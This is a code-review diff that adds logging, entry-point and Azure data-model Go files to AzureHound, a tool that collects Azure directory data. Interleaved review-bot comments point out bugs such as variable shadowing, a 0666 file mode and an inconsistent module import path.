+ return &logr, nil
+}
+
+func getEventLogLevelWriter() zerolog.LevelWriter {
+ if eventLogWriter != nil {
+ return eventLogWriter
+ } else if isWindowsService, err := svc.IsWindowsService(); !isWindowsService || err != nil {
+ return nil
+ } else if eventLogWriter, err := NewEventLogWriter(constants.Name); err != nil {
+ return nil
+ } else {
+ return eventLogWriter
+ }
+}
diff --git a/logger/utils.go b/logger/utils.go
new file mode 100644
index 0000000..d433aa7
--- /dev/null
+++ b/logger/utils.go
@@ -0,0 +1,56 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package logger
+
+import (
+ "io"
+ "os"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/go-logr/logr"
+)
+
+var (
+ log *logr.Logger
+ fileLogWriter io.Writer
+)
+
+func getFileLogLevelWriter() io.Writer {
+ if fileLogWriter != nil {
+ return fileLogWriter
+ } else if logfile, ok := config.LogFile.Value().(string); !ok || logfile == "" {
+ return nil
+ } else if file, err := os.OpenFile(logfile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666); err != nil {
+ return nil
+ } else {
+ return file
+ }
+}
+
+func GetLogger() (*logr.Logger, error) {
+ if log != nil {
+ return log, nil
+ }
+
+ if logr, err := setupLogger(); err != nil {
+ return nil, err
+ } else {
+ log = logr
+ return log, nil
+ }
+}
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..b6d8083
--- /dev/null
+++ b/main.go
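Review bot: `getEventLogLevelWriter` never populates the package-level `eventLogWriter`: the clause `else if eventLogWriter, err := NewEventLogWriter(constants.Name)` declares a new local that shadows it, so the `eventLogWriter != nil` fast path cannot hit and each call opens another event log handle. Both failure branches also return nil without recording why, so a service that cannot open the event log runs with no indication of it. Assigning to the package variable (`w, err := NewEventLogWriter(constants.Name)` and then `eventLogWriter = w`) and writing the error to `os.Stderr` would fix both. `getFileLogLevelWriter` in logger/utils.go leaves its `fileLogWriter` cache unassigned in the same way.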
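Review bot: `getFileLogLevelWriter` creates the log file with mode `0666`, which leaves it readable and, depending on the umask, writable by other local users. The logs of a collector presumably include tenant and object details, so an owner-only mode is the safer default: `os.OpenFile(logfile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)`. An open failure returns nil without a message, so a mistyped or unwritable `LogFile` path silently disables file logging. `GetLogger` sets the package-level `log` without synchronisation; whether that matters depends on callers that are not visible in this hunk.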
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+//go:build !windows
+// +build !windows
+
+package main
+
+import (
+ "fmt"
+ "os"
+
+ "github.com/bloodhoundad/azurehound/v2/cmd"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+)
+
+func main() {
+ fmt.Fprintf(os.Stderr, "%s %s\n%s\n\n", constants.DisplayName, constants.Version, constants.AuthorRef)
+ cmd.Execute()
+}
diff --git a/main_windows.go b/main_windows.go
new file mode 100644
index 0000000..0855982
--- /dev/null
+++ b/main_windows.go
@@ -0,0 +1,41 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package main
+
+import (
+ "fmt"
+
+ "golang.org/x/sys/windows/svc"
+
+ "github.com/byt3n33dl3/azurehoundad/v2/cmd"
+ "github.com/byt3n33dl3/azurehoundad/v2/constants"
+)
+
+func main() {
+ fmt.Printf("%s %s\n%s\n\n", constants.DisplayName, constants.Version, constants.AuthorRef)
+
+ if isWinSvc, err := svc.IsWindowsService(); err != nil {
+ panic(err)
+ } else if isWinSvc {
+ if err := cmd.StartWindowsService(); err != nil {
+ panic(err)
+ }
+ } else {
+ cmd.Execute()
+ }
+}
diff --git a/models/app-member.go b/models/app-member.go
new file mode 100644
index 0000000..c56b3f6
--- /dev/null
+++ b/models/app-member.go
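Review bot: The imports here point at `github.com/byt3n33dl3/azurehoundad/v2/cmd` and `github.com/byt3n33dl3/azurehoundad/v2/constants`, while main.go and every other file in this patch import from `github.com/bloodhoundad/azurehound/v2`. A Windows build therefore either fails to resolve these packages or links `cmd` and `constants` from a different module than the tree under review, which needs settling before merge. Unless go.mod (not visible here) says otherwise, I would expect `"github.com/bloodhoundad/azurehound/v2/cmd"` and `"github.com/bloodhoundad/azurehound/v2/constants"`. The banner is also printed to stdout with `fmt.Printf`, whereas main.go writes it to `os.Stderr`; stderr keeps piped command output clean.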
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "encoding/json"
+)
+
+type AppMember struct {
+ json.RawMessage
+ AppId string `json:"appId"`
+}
+
+func (s *AppMember) MarshalJSON() ([]byte, error) {
+ var data map[string]any
+ if err := json.Unmarshal(s.RawMessage, &data); err != nil {
+ return nil, err
+ } else {
+ StripEmptyEntries(data)
+ data["appId"] = s.AppId
+ return json.Marshal(data)
+ }
+}
diff --git a/models/app-owner.go b/models/app-owner.go
new file mode 100644
index 0000000..ec3ac64
--- /dev/null
+++ b/models/app-owner.go
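Review bot: `MarshalJSON` panics when `s.RawMessage` holds the JSON literal `null`: `json.Unmarshal` succeeds and leaves `data` as a nil map, and `data["appId"] = s.AppId` then writes to it. An empty `RawMessage` takes the error path instead, so the two "no payload" cases behave differently. Adding `if data == nil { data = make(map[string]any) }` ahead of the `StripEmptyEntries` call covers the first case. `StripEmptyEntries` is defined outside this hunk, so I cannot tell how it treats a nil map.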
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "encoding/json"
+)
+
+type AppOwner struct {
+ Owner json.RawMessage `json:"owner"`
+ AppId string `json:"appId"`
+}
+
+func (s *AppOwner) MarshalJSON() ([]byte, error) {
+ output := make(map[string]any)
+ output["appId"] = s.AppId
+
+ if owner, err := OmitEmpty(s.Owner); err != nil {
+ return nil, err
+ } else {
+ output["owner"] = owner
+ return json.Marshal(output)
+ }
+}
+
+type AppOwners struct {
+ Owners []AppOwner `json:"owners"`
+ AppId string `json:"appId"`
+}
diff --git a/models/app-role-assignments.go b/models/app-role-assignments.go
new file mode 100644
index 0000000..f00fd8d
--- /dev/null
+++ b/models/app-role-assignments.go
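Review bot: `MarshalJSON` is declared on `*AppOwner`, so `encoding/json` only calls it for addressable values. Elements of `AppOwners.Owners` and `*AppOwner` values go through `OmitEmpty`, but an `AppOwner` passed by value to `json.Marshal` is encoded with the default struct rules and keeps its empty entries. If no caller relies on that difference, a value receiver `func (s AppOwner) MarshalJSON() ([]byte, error)` makes both paths agree; `AppMember` in models/app-member.go is declared the same way. `OmitEmpty` is defined outside this hunk.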
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type AppRoleAssignment struct {
+ azure.AppRoleAssignment
+ AppId string `json:"appId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/app.go b/models/app.go
new file mode 100644
index 0000000..238d2ad
--- /dev/null
+++ b/models/app.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type App struct {
+ azure.Application
+ TenantId string `json:"tenantId"`
+ TenantName string `json:"tenantName"`
+}
diff --git a/models/automation-account.go b/models/automation-account.go
new file mode 100644
index 0000000..0e3bfea
--- /dev/null
+++ b/models/automation-account.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type AutomationAccount struct {
+ azure.AutomationAccount
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ ResourceGroupName string `json:"resourceGroupName"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/azure-role-assignment.go b/models/azure-role-assignment.go
new file mode 100644
index 0000000..e8ba1a2
--- /dev/null
+++ b/models/azure-role-assignment.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type AzureRoleAssignment struct {
+ Assignee azure.RoleAssignment `json:"assignee"`
+ ObjectId string `json:"objectId"`
+ RoleDefinitionId string `json:"roleDefinitionId"`
+}
+
+type AzureRoleAssignments struct {
+ RoleAssignments []AzureRoleAssignment `json:"assignees"`
+ ObjectId string `json:"objectId"`
+}
diff --git a/models/azure/access_policy_entry.go b/models/azure/access_policy_entry.go
new file mode 100644
index 0000000..5477af0
--- /dev/null
+++ b/models/azure/access_policy_entry.go
@@ -0,0 +1,35 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// An identity that have access to the key vault. All identities in the array must use the same tenant ID as the key
+// vault's tenant ID.
+type AccessPolicyEntry struct {
+ // Application ID of the client making request on behalf of a principal
+ ApplicationId string `json:"applicationId,omitempty"`
+
+ // The object ID of a user, service principal or security group in the Azure Active Directory tenant for the vault.
+ // The object ID must be unique for the list of access policies.
+ ObjectId string `json:"objectId,omitempty"`
+
+ // Permissions the identity has for keys, secrets and certificates.
+ Permissions KeyVaultPermissions `json:"permissions,omitempty"`
+
+ // The Azure Active Directory tenant ID that should be used for authenticating requests to the key vault.
+ TenantId string `json:"tenantId,omitempty"`
+}
diff --git a/models/azure/addin.go b/models/azure/addin.go
new file mode 100644
index 0000000..84faafb
--- /dev/null
+++ b/models/azure/addin.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Defines custom behavior that a consuming service can use to call an app in specific contexts.For example, applications
+// that can render file streams may configure addIns for its "FileHandler" functionality. This will let services like
+// Microsoft 365 call the application in the context of a document the user is working on.
+type AddIn struct {
+ Id uuid.UUID `json:"id,omitempty"`
+ Properties []KeyValue `json:"properties,omitempty"`
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/additional_capabilities.go b/models/azure/additional_capabilities.go
new file mode 100644
index 0000000..e91dabe
--- /dev/null
+++ b/models/azure/additional_capabilities.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Enables or disables a capability on the virtual machine or virtual machine scale set.
+type AdditionalCapabilities struct {
+ // The flag that enables or disables hibernation capability on the VM.
+ HibernationEnabled bool `json:"hibernationEnabled,omitempty"`
+
+ // The flag that enables or disables a capability to have one or more managed data disks with UltraSSD_LRS storage
+ // account type on the VM or VMSS. Managed disks with storage account type UltraSSD_LRS can be added to a virtual
+ // machine or virtual machine scale set only if this property is enabled.
+ UltraSSDEnabled bool `json:"ultraSSDEnabled,omitempty"`
+}
diff --git a/models/azure/additional_unattend_content.go b/models/azure/additional_unattend_content.go
new file mode 100644
index 0000000..7545bea
--- /dev/null
+++ b/models/azure/additional_unattend_content.go
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies additional XML formatted information that can be included in the Unattend.xml file, which is used by
+// Windows Setup. Contents are defined by setting name, component name, and the pass in which the content is applied.
+type AdditionalUnattendContent struct {
+ // The component name. Currently, the only allowable value is Microsoft-Windows-Shell-Setup.
+ ComponentName string `json:"componentName,omitempty"`
+
+ // Specifies the XML formatted content that is added to the unattend.xml file for the specified path and component.
+ // The XML must be less than 4KB and must include the root element for the setting or feature that is being inserted.
+ Content string `json:"content,omitempty"`
+
+ // The pass name. Currently, the only allowable value is OobeSystem.
+ PassName string `json:"passName,omitempty"`
+
+ // Specifies the name of the setting to which the content applies.
+ // Possible values are: FirstLogonCommands and AutoLogon.
+ SettingName string `json:"settingName,omitempty"`
+}
diff --git a/models/azure/alt_security_id.go b/models/azure/alt_security_id.go
new file mode 100644
index 0000000..1134353
--- /dev/null
+++ b/models/azure/alt_security_id.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// For internal use only. This complex type will be deprecated in the future.
+type AlternativeSecurityId struct {
+ Type int32 `json:"type,omitempty"`
+ IdentityProvider string `json:"identity_provider,omitempty"`
+
+ // Base64Url encoded.
+ Key string `json:"key,omitempty"`
+}
diff --git a/models/azure/api_application.go b/models/azure/api_application.go
new file mode 100644
index 0000000..d282da4
--- /dev/null
+++ b/models/azure/api_application.go
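Review bot: The tag `json:"identity_provider,omitempty"` on `IdentityProvider` is the only snake_case key among the models in this part of the patch, and Microsoft Graph names this property `identityProvider` on the alternativeSecurityId resource. `encoding/json` matches keys case-insensitively but not across an underscore, so the field would stay empty after decoding a Graph response. Unless a consumer depends on the current key, `json:"identityProvider,omitempty"` matches the API.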
@@ -0,0 +1,59 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Specifies settings for an application that implements a web API.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/apiapplication?view=graph-rest-1.0
+type ApiApplication struct {
+ // When true, allows an application to use claims mapping without specifying a custom signing key.
+ AcceptMappedClaims bool `json:"acceptMappedClaims,omitempty"`
+
+ // Used for bundling consent if you have a solution that contains two parts: a client app and a custom web API app.
+ // If you set the appID of the client app to this value, the user only consents once to the client app. Azure AD
+ // knows that consenting to the client means implicitly consenting to the web API and automatically provisions
+ // service principals for both APIs at the same time. Both the client and the web API app must be registered in the
+ // same tenant.
+ KnownClientApplications []uuid.UUID `json:"knownClientApplications,omitempty"`
+
+ // The definition of the delegated permissions exposed by the web API represented by this application registration.
+ // These delegated permissions may be requested by a client application, and may be granted by users or
+ // administrators during consent. Delegated permissions are sometimes referred to as OAuth 2.0 scopes.
+ OAuth2PermissionScopes []PermissionScope `json:"oauth2PermissionScopes,omitempty"`
+
+ // Lists the client applications that are pre-authorized with the specified delegated permissions to access this
+ // application's APIs. Users are not required to consent to any pre-authorized application (for the permissions
+ // specified). However, any additional permissions not listed in preAuthorizedApplications (requested through
+ // incremental consent for example) will require user consent.
+ PreAuthorizedApplications []PreAuthorizedApplication `json:"preAuthorizedApplications,omitempty"`
+
+ // Specifies the access token version expected by this resource.
+ // This changes the version and format of the JWT produced independent of the endpoint or client used to request the
+ // access token.
+ //
+ // The endpoint used, v1.0 or v2.0, is chosen by the client and only impacts the version of id_tokens. Resources
+ // need to explicitly configure requestedAccessTokenVersion to indicate the supported access token format.
+ //
+ // Possible values for requestedAccessTokenVersion are 1, 2, or null. If the value is null, this defaults to 1,
+ // which corresponds to the v1.0 endpoint.
+ //
+ // If signInAudience on the application is configured as AzureADandPersonalMicrosoftAccount, the value for this
+ //property must be 2
+ RequestedAccessTokenVersion int32 `json:"requestedAccessTokenVersion,omitempty"`
+}
diff --git a/models/azure/app_profile.go b/models/azure/app_profile.go
new file mode 100644
index 0000000..874235f
--- /dev/null
+++ b/models/azure/app_profile.go
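Review bot: `RequestedAccessTokenVersion` is declared `int32`, but its own comment says the value may be 1, 2 or null, with null meaning version 1. A null decodes to 0, which is not a valid version, and `omitempty` then drops it on output, so a consumer cannot tell "unset, defaults to v1" from a field that was never returned. Since the token version decides which token format the resource accepts, I would keep the distinction by declaring the field as `RequestedAccessTokenVersion *int32` with the tag unchanged. The last comment line, `//property must be 2`, is also missing the space after `//`.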
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Contains the list of gallery applications that should be made available to the VM/VMSS.
+type ApplicationProfile struct {
+ // Specifies the gallery applications that should be made available to the VM/VMSS
+ GalleryApplications []VMGalleryApplication `json:"galleryApplications,omitempty"`
+}
diff --git a/models/azure/app_role.go b/models/azure/app_role.go
new file mode 100644
index 0000000..fd82fe6
--- /dev/null
+++ b/models/azure/app_role.go
@@ -0,0 +1,41 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Represents an application role that can be requested by (and granted to) a client application, or that can be used to
+// assign an application to users or groups in a specified role.
+//
+// To add, update, or remove app roles for an application, update the application for the app or service. App roles on
+// the application entity will be available in all tenants where the application is used. To define app roles that are
+// only applicable in your tenant (for example, app roles representing custom roles in your instance of a multi-tenant
+// application), you can also update the service principal for the app, to add or update app roles to the appRoles
+// collection.
+//
+// With appRoleAssignments, app roles can be assigned to users, groups, or other applications' service principals.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/approle?view=graph-rest-1.0
+type AppRole struct {
+ AllowedMemberTypes []string `json:"allowedMemberTypes,omitempty"`
+ Description string `json:"description,omitempty"`
+ DisplayName string `json:"displayName,omitempty"`
+ Id uuid.UUID `json:"id,omitempty"`
+ IsEnabled bool `json:"isEnabled,omitempty"`
+ Origin string `json:"origin,omitempty"`
+ Value string `json:"value,omitempty"`
+}
diff --git a/models/azure/app_role_assignment.go b/models/azure/app_role_assignment.go
new file mode 100644
index 0000000..708a4d8
--- /dev/null
+++ b/models/azure/app_role_assignment.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Represents an application role that can be requested by (and granted to) a client application, or that can be used to
+// assign an application to users or groups in a specified role.
+//
+// An app role assignment is a relationship between the assigned principal (a user, a group, or a service principal),
+// a resource application (the app's service principal) and an app role defined on the resource application.
+//
+// With appRoleAssignments, app roles can be assigned to users, groups, or other applications' service principals.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/approleassignment?view=graph-rest-1.0
+type AppRoleAssignment struct {
+ AppRoleId uuid.UUID `json:"appRoleId,omitempty"`
+ CreatedDateTime string `json:"createdDateTime,omitempty"`
+ Id string `json:"id,omitempty"`
+ PrincipalDisplayName string `json:"principalDisplayName,omitempty"`
+ PrincipalId uuid.UUID `json:"principalId,omitempty"`
+ PrincipalType string `json:"principalType,omitempty"`
+ ResourceDisplayName string `json:"resourceDisplayName,omitempty"`
+ ResourceId string `json:"resourceId,omitempty"`
+}
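Review bot: The first paragraph of the `AppRoleAssignment` doc comment is copied from `AppRole` and describes a role rather than an assignment. I would drop it and open with the second paragraph, reworded to start with the type name, e.g. `// AppRoleAssignment is a relationship between the assigned principal, a resource application and an app role defined on it.` The fields carry no comments either; one line each on `PrincipalId`, `ResourceId` and `AppRoleId` would make it clear which side of the grant each identifies. `ResourceId` is a `string` while `AppRoleId` and `PrincipalId` are `uuid.UUID`; if the API returns a GUID there too (worth confirming against the linked reference), `ResourceId uuid.UUID` would keep the three consistent.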
diff --git a/models/azure/app_scope.go b/models/azure/app_scope.go
new file mode 100644
index 0000000..ff2da07
--- /dev/null
+++ b/models/azure/app_scope.go
@@ -0,0 +1,41 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The scope of a role assignment determines the set of resources for which the principal has been granted access.
+// An app scope is a scope defined and understood by a specific application, unlike directory scopes which are shared
+// scopes stored in the directory and understood by multiple applications.
+//
+// This may be in both the following principal and scope scenarios:
+//
+// A single principal and a single scope
+// Multiple principals and multiple scopes.
+type AppScope struct {
+ Entity
+
+ // Provides the display name of the app-specific resource represented by the app scope.
+ // Provided for display purposes since appScopeId is often an immutable, non-human-readable id.
+ // Read-only.
+ DisplayName string `json:"display_name,omitempty"`
+
+ // Describes the type of app-specific resource represented by the app scope.
+ // Provided for display purposes, so a user interface can convey to the user the kind of app specific resource
+ // represented by the app scope.
+ // Read-only.
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/application.go b/models/azure/application.go
new file mode 100644
index 0000000..a44a103
--- /dev/null
+++ b/models/azure/application.go
@@ -0,0 +1,171 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents an application. Any application that outsources authentication to Azure Active Directory (Azure AD) must
+// be registered in a directory. Application registration involves telling Azure AD about your application, including
+// the URL where it's located, the URL to send replies after authentication, the URI to identify your application, and
+// more.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/application?view=graph-rest-1.0
+type Application struct {
+ DirectoryObject
+
+ // Defines custom behavior that a consuming service can use to call an app in specific contexts.
+ // For example, applications that can render file streams may set the addIns property for its "FileHandler"
+ // functionality. This will let services like Office 365 call the application in the context of a document the user
+ // is working on.
+ AddIns []AddIn `json:"addIns,omitempty"`
+
+ // Specifies settings for an application that implements a web API.
+ Api ApiApplication `json:"api,omitempty"`
